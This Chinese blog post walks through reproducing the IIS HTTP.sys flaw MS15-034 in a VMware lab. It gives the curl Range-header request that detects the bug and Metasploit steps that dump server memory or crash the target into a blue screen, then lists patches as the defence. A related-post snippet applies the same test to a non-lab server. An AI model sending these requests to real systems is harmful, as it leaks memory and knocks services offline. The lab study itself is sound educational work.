CVE-2015-1635/MS15-034远程代码执行漏洞

已于 2022-09-20 10:32:38 修改
阅读量4.2k 收藏 9
点赞数
文章标签: microsoft
于 2022-09-20 10:30:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dgjkkhcf/article/details/126947728
版权

目录

一、CVE-2015-1635/MS15-034

1、漏洞背景

2、影响版本

二、实验环境

三、漏洞复现

1、在win 7上开启iis服务

2、使用kali验证靶机漏洞是否存在

3、使用MSF框架自带的攻击模块对靶机进行渗透

利用ms15-034漏洞读取靶机内存数据

利用ms15-034漏洞进行ddos攻击

四、防御措施

一、CVE-2015-1635/MS15-034

1、漏洞背景

在4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码漏洞CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该漏洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行。

这是对于服务器系统影响不小的安全漏洞,任何安装了微软IIS 6.0以上的的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响。

从微软的公告致谢来看,这个漏洞是由“Citrix Security Response Team”(美国思杰公司的安全响应团队)发现,从网上公开的信息来看,Citrix公司是一家从事云计算虚拟化、虚拟桌面和远程接入技术领域的高科技企业。这也引发了Twitter上很多关于该漏洞是否是由针对Citrix公司的APT攻击中发现的疑问,而就在微软发布补丁的不到12个小时内,便有匿名用户在Pastebin网站上贴出了针对这个漏洞可用的概念验证攻击代码,似乎也印证了这一点。

2、影响版本

IIS 7.0以上的Windows 7/8/8.1和Windows Server 2008 R2/Server 2012/Server 2012 R2等操作系统。

二、实验环境

攻击机:kali-2022 版

靶机:win 7 x64 专业版

注:实验环境均由VMware Workstation Pro搭建而成,镜像可自行百度,官网下载,不是在官网下载的请选择普通下载,以免下载“全家桶”或下载到捆绑病毒使电脑中毒,攻击机与靶机需在同一网段且互相ping通

三、漏洞复现

1、在win 7上开启iis服务

控制面板>程序>程序和功能>打开或关闭防火墙功能>勾选上Web管理工具和万维网服务,然后确定即可开启iis服务

我们访问一下

http://127.0.0.1/

如上所示证明开启了iis服务

2、使用kali验证靶机漏洞是否存在

curl -v 192.168.50.205 -H "Host:irrelevant" -H "Range:bytes=0-18446744073709551615"

返回如上信息证明靶机存在此漏洞

3、使用MSF框架自带的攻击模块对靶机进行渗透

search ms15-034 #查看可使用模块

这里存在两个可利用的模块:一个是对靶机进行ddos攻击的,一个是获取靶机内存数据的(对应序号分别为0和1)

利用ms15-034漏洞读取靶机内存数据

use 1 #或(use auxiliary/scanner/http/ms15_034_http_sys_memory_dump)使用该模块

show options #查询所需配置

set rhosts 192.168.50.205 #设置靶机IP

run #运行

返回上图说明靶机内存数据获取成功

利用ms15-034漏洞进行ddos攻击

同样借助MSF框架:

use 0

show options

set rhosts 192.168.50.205

run

攻击开始后,靶机瞬间蓝屏然后自动重启

四、防御措施

1.打补丁

2.临时禁用IIS内核缓存

猿猿酱
关注
  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
网络安全-IIS8.0-10.0漏洞复现和修复
weixin_65409651的博客
07-11 1774
代码】网络安全-IIS8.0-10.0漏洞复现和修复。
HTTP.sys 远程代码执行漏洞(CVE-2015-1635/MS15-034)
SoulCat
06-03 4361
HTTP.sys 远程代码执行漏洞(CVE-2015-1635/MS15-034) 后来我发现世界真的很大,没有刻意地见面,就真没有再见过了 漏洞概述: HTTP.SYS是从IIS6.0开始,为了更好的在windows上优化IIS服务器性能而引入一个操作系统核心组件。它为IIS及其他需要运用HTTP协议的服务器提供HTTP请求的接收与响应、快速缓存等功能服务。漏洞主要存在于 HTTP 协议堆...
MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞漏洞验证)
LiBai'S BLOG
08-18 8792
以下内容并非在靶场,是在真实环境进行漏洞验证。 1️⃣漏洞测试 使用curl工具进行测试,测试命令: curl http://1.1.1.1 -H "Host: 1.1.1.1" -H "Range: bytes=0-18446744073709551615" 2️⃣漏洞验证 ????利用ms15-034漏洞读取服务器内存数据 借助metasploit平台: use auxiliary/scanner/http/ms15_034_http_sys_memory_dump set rhosts 1.
MS15-034 HTTP.sys 远程执行代码CVE-2015-1635)POC
03-19
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码
MS15-034 CVE-2015-1635 HTTP远程代码执行漏洞漏洞验证)_ms15-034 cve-2015-1635 http远程代码执行漏洞检测
2401_83974087的博客
04-18 715
当存在CVE-2015-1635漏洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行以及敏感信息泄露。该漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP请求时会导致此漏洞。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。攻击开始后,服务器瞬间蓝屏然后自动重启,由于实在真实环境中进行漏洞验证DDOS攻击危害严重所以不执行命令进行演示。
HTTP.SYS远程代码执行漏洞CVE-2015-1635,MS15-034
pyy的博客
12-11 1万+
漏洞描述及渗透过程 HTTP协议堆栈(HTTP.sys)中存在一个远程执行代码漏洞,该漏洞是在HTTP.sys不正确地分析特制HTTP请求时引起的。   漏洞危害 攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。 修复建议 1)微软官方已经给出修复补丁(KB3042553),用户安装修复补丁即可。 2) 变通办法,禁用IIS内核...
HTTP.sys远程执行代码漏洞CVE-2015-1635MS15-034
Fly_鹏程万里
05-05 8924
前言 在2015年4月的补丁日,微软通过标记为“高危”的MS15-034补丁,修复了HTTP.SYS中一处远程代码漏洞CVE-2015-1635。据微软公告(https://technet.microsoft.com/en-us/library/security/MS15-034)所称,当存在该漏洞的HTTP服务器接收到精心构造的HTTP请求时,可能触发远程代码在目标系统以系统权限执行。 影响...
HTTP.sys 远程执行代码 漏洞 MS15-034 CVE-2015-1635
mixboot
09-26 1805
HTTP.sys 远程执行代码 漏洞MS15-034 漏洞分析 MS15-034 漏洞分析 参考: [思路/技术] HTTP.SYS远程执行代码漏洞分析 (MS15-034
HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635MS15-034
7Riven's blog
12-07 2万+
目录 漏洞概述 漏洞环境部署 漏洞验证 漏洞利用:ms15_034 漏洞防御 漏洞概述 HTTP.sys简介 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞 漏洞成因 远程执行代码漏洞存在于 ...
Windows Server 2012 R2 MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞
友人A的博客
08-10 483
一、漏洞情况 1、漏洞情况 2、漏洞详情 二、整改记录 1、打开链接 2、点击下载 3、安装更新补丁 4、再次扫描没有该漏洞
HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635) 漏洞修复
08-21
Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
CVE-2015-1635MS15-034远程代码执行漏洞复现
热门推荐
m0_37638874的博客
06-10 2万+
  1 漏洞背景   2 漏洞影响   3 漏洞利用     3.1 服务器配置与搭建     3.2 测试       3.2.1 curl命令       3.2.2 Host字段       3.2.3 Range字段     3.3 攻击利用   4 防御措施1 漏洞背景2 漏洞影响3 漏洞利用3.1 服务器配置与搭建win7我们如何开启iis服务呢控制面板>程序和功能>打开或关闭windows功能>Internet信息服务>勾选Web管理工具和万维网服务 我们访问一下 如上所示证明开启了iis服
CVE-2015-1635
龙卷风摧毁停车场
02-21 2315
Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。Microsoft Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。使用Microsoft IIS 6.0以上版本的Microsoft Windows的HTTP协议堆栈(HTTP.sys)中存在远程执行代码漏洞,该漏洞源于HTTP.sys文件没有正确分析经特殊设计的HTTP请求。
Windows Server 2012 R2 Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
友人A的博客
06-17 1310
一、漏洞情况 二、整改记录
CVE-2015-1635-HTTP.SYS远程执行代码漏洞ms15-034
鹿鸣天涯
12-16 4005
Windows Server 2012 R2修复MS15-034漏洞,此更新不适用于您的计算机 1.MS15-034漏洞的补丁是KB3042553; 2.如果在一台Windows Server 2012 R2的服务器上直接安装补丁文件KB3042553,可能会出现“此更新不适用于您的计算机”的问题,这是因为此补丁依赖于补丁:KB3021910、KB2919355。只需要按顺序安装以下补丁即可:KB2919442、KB3021910、KB2919355、KB3042553; 3.安装补丁之后对机器的性能、.n
HTTP.sys ms15-034 远程代码执行漏㓊(CVE-2015-1635
最新发布
qq_68163788的博客
06-28 882
HTTP.sys ms15-034 远程代码执行漏洞CVE-2015-1635)是一种远程命令执行漏洞,允许攻击者通过发送特制的HTTP请求触发漏洞,从而在受影响的系统上执行恶意代码。这个漏洞Microsoft Windows中的HTTP服务模块(HTTP.sys)中被发现。漏洞影响了Windows 7、Windows 8、Windows 8.1、Windows Server 2008 R2、Windows Server 2012和Windows Server 2012 R2。漏洞允许攻击者在系统上执行
网络安全进阶篇(十二章-2)HTTP.SYS远程代码执行漏洞(MS15-034)
划水的小白白
08-31 4303
1.简介 漏洞编号:CVE-2015-1635MS15-034远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中, 当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 2.影响范围 任何安装了微软IIS 6.0以上的 Win Server 2008 R2、 Win Server 2012、 Win Server 2012 R2、 Win 7、 Win 8、 Win 8.1
CVE-2015-1635(MS15-034)-HTTP.sys远程代码执行复现
1stPeak's Blog
04-12 3037
一、漏洞描述 HTTP协议栈(HTTP.sys)存在远程代码执行漏洞,是由于HTTP.sys不正确的解析HTTP请求引起的,成功利用此漏洞的攻击者可以执行系统账户上任意代码。 攻击者必须发送一个HTTP请求到受影响的系统去触发这个漏洞,通过修改Windows HTTP栈处理请求更新漏洞地址。 主要存在Windows+IIS的环境下,任何安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server 2012 R2以及Windows 7/8/8.1操作系统都受
CVE-2015-1635:IIS远程代码执行漏洞/HTTP.sys 远程执行代码漏洞(MS15-034)
weixin_38896449的博客
06-01 1187
1、漏洞介绍 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 影响版本: 安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本 2、漏洞检测 执行curl http://11.
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)【原理扫描】
05-24
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)是一种存在于HTTP协议栈中的安全漏洞,可以导致远程攻击者在未经身份验证的情况下以SYSTEM权限执行任意代码。攻击者可以通过发送特制的HTTP请求来利用该漏洞。 该漏洞的原理是在HTTP.sys驱动程序中存在一个缓冲区溢出漏洞,攻击者可以通过发送特制的HTTP请求来触发该漏洞。当HTTP.sys驱动程序接收到特制的HTTP请求时,它会尝试解析请求头,并将其复制到缓冲区中。但如果请求头中包含了一些特定的数据,就会导致缓冲区溢出,从而使攻击者能够执行任意代码。 为了检测该漏洞,可以使用一些漏洞扫描工具,如Nessus、OpenVAS等。这些工具可以通过发送特制的HTTP请求来检测目标系统是否存在该漏洞。 同时,为了防止该漏洞的利用,可以采取以下措施: 1. 安装Microsoft发布的安全补丁; 2. 禁用WebDAV; 3. 配置网络防火墙,限制HTTP请求的访问权限; 4. 使用WAF(Web应用程序防火墙)等安全设备,对HTTP请求进行过滤和检查。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

猿猿酱

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值